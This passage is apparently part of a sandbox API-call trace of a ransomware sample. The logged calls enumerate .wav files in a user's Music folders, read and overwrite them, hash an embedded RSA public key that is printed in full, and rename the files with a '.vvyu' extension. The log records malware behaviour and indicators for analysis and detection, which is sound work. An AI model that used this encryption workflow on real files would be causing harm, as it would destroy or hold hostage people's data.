lpMem=0x2adf8d8 | out: hHeap=0x2c0000) returned 1 [0199.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0199.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0199.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0199.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0199.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0199.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0199.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0199.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.663] WriteFile (in: hFile=0x584, lpBuffer=0x2af9168*, nNumberOfBytesToWrite=0x11347, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af9168*, lpNumberOfBytesWritten=0x2f9fb14*=0x11347, lpOverlapped=0x0) returned 1 [0199.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af9168 | out: hHeap=0x2c0000) returned 1 [0199.665] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1134c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.665] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0199.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0199.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e0 [0199.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0199.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0199.666] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.666] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.666] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.667] CloseHandle (hObject=0x584) returned 1 [0199.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29add10 [0199.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x2af3f88 [0199.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29add10 | out: hHeap=0x2c0000) returned 1 [0199.669] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\AZ2aRaMGzQB\\8b1WNKi0f8BaPAX.wav" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\az2aramgzqb\\8b1wnki0f8bapax.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\AZ2aRaMGzQB\\8b1WNKi0f8BaPAX.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\az2aramgzqb\\8b1wnki0f8bapax.wav.vvyu")) returned 1 [0199.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0199.671] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381bd0 | out: hHeap=0x2c0000) returned 1 [0199.674] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32e48ae0, ftCreationTime.dwHighDateTime=0x1d8a233, ftLastAccessTime.dwLowDateTime=0x49abebb0, ftLastAccessTime.dwHighDateTime=0x1d8a265, ftLastWriteTime.dwLowDateTime=0x49abebb0, ftLastWriteTime.dwHighDateTime=0x1d8a265, nFileSizeHigh=0x0, nFileSizeLow=0x755a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="i 1M.wav", cAlternateFileName="I1M~1.WAV")) returned 1 [0199.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6) returned 0x381bd0 [0199.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.674] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\AZ2aRaMGzQB\\i 1M.wav") returned=".wav" [0199.674] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\AZ2aRaMGzQB\\i 1M.wav" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\az2aramgzqb\\i 1m.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0199.675] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=30042) returned 1 [0199.675] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0199.679] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x7534, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.679] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0199.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0199.681] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.681] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x755a, lpOverlapped=0x0) returned 1 [0199.682] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0199.682] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.682] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.682] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31ba80) returned 1 [0199.683] CryptCreateHash (in: hProv=0x31ba80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0199.683] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.683] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0199.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0199.683] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0199.683] GetLastError () returned 0x0 [0199.684] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0199.684] CryptReleaseContext (hProv=0x31ba80, dwFlags=0x0) returned 1 [0199.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.684] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0199.684] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0199.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.684] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0199.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0199.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0199.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7560) returned 0x2afb168 [0199.685] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0199.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e0 [0199.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0199.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2adea10 [0199.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ab8 [0199.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2adea58 [0199.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ad0 [0199.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b00 [0199.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b60 [0199.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b18 [0199.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0199.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0199.686] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0199.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0199.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0199.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0199.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b60 | out: hHeap=0x2c0000) returned 1 [0199.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0199.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b60 [0199.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0199.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b18 [0199.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0199.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6b00 [0199.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0199.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0199.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0199.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0199.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0199.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0199.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0199.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0199.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0199.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0199.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0199.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0199.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b60 | out: hHeap=0x2c0000) returned 1 [0199.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0199.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0199.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0199.689] GetCurrentThreadId () returned 0x5d8 [0199.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0199.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af5f00 [0199.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0199.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31ba80 [0199.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0199.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0199.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0199.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0199.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.690] GetCurrentThreadId () returned 0x5d8 [0199.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0199.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0199.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0199.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0199.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0199.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0199.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0199.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b60 [0199.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0199.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0199.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0199.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0199.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0199.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0199.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0199.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b00 [0199.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0199.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0199.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0199.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0199.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0199.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0199.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b18 [0199.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0199.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0199.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0199.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ae8 [0199.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0199.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b78 [0199.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0199.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b48 [0199.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b30 [0199.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0199.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b90 [0199.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b30 | out: hHeap=0x2c0000) returned 1 [0199.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b30 [0199.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b48 | out: hHeap=0x2c0000) returned 1 [0199.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0199.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0199.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0199.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0199.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0199.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0199.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b00 [0199.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0199.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8d8 [0199.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b60 | out: hHeap=0x2c0000) returned 1 [0199.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0199.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b90 | out: hHeap=0x2c0000) returned 1 [0199.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0199.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0199.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0199.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0199.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0199.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0199.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0199.695] HeapFree (in: 